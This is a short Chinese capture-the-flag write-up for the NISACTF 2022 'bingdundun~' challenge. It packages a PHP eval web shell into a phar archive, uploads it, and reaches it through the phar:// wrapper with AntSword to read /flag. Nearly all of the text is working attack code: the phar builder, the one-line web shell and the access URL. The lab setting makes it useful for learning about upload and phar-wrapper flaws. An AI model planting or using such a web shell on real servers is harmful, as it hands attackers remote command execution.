跳转至

[NISACTF 2022]bingdundun~

phar 上传然后phar伪协议访问


//pchar.php
<?php
$phar = new Phar('exp.phar');   //
$phar->buildFromDirectory('./exp');//buildFromDirectory指定压缩的目录
$phar->compressFiles(Phar::GZ);  //Phar::GZ表示使用gzip来压缩此文件
$phar->stopBuffering();
$phar->setStub($phar->createDefaultStub('exp.php'));//setSub用来设置启动加载的文件
?>
//exp/exp.php
<?php
@eval($_POST['shell']);
?>

最后蚁剑访问 密码shell ?bingdundun=phar://./upload_name/exp

flag就在/flag里

评论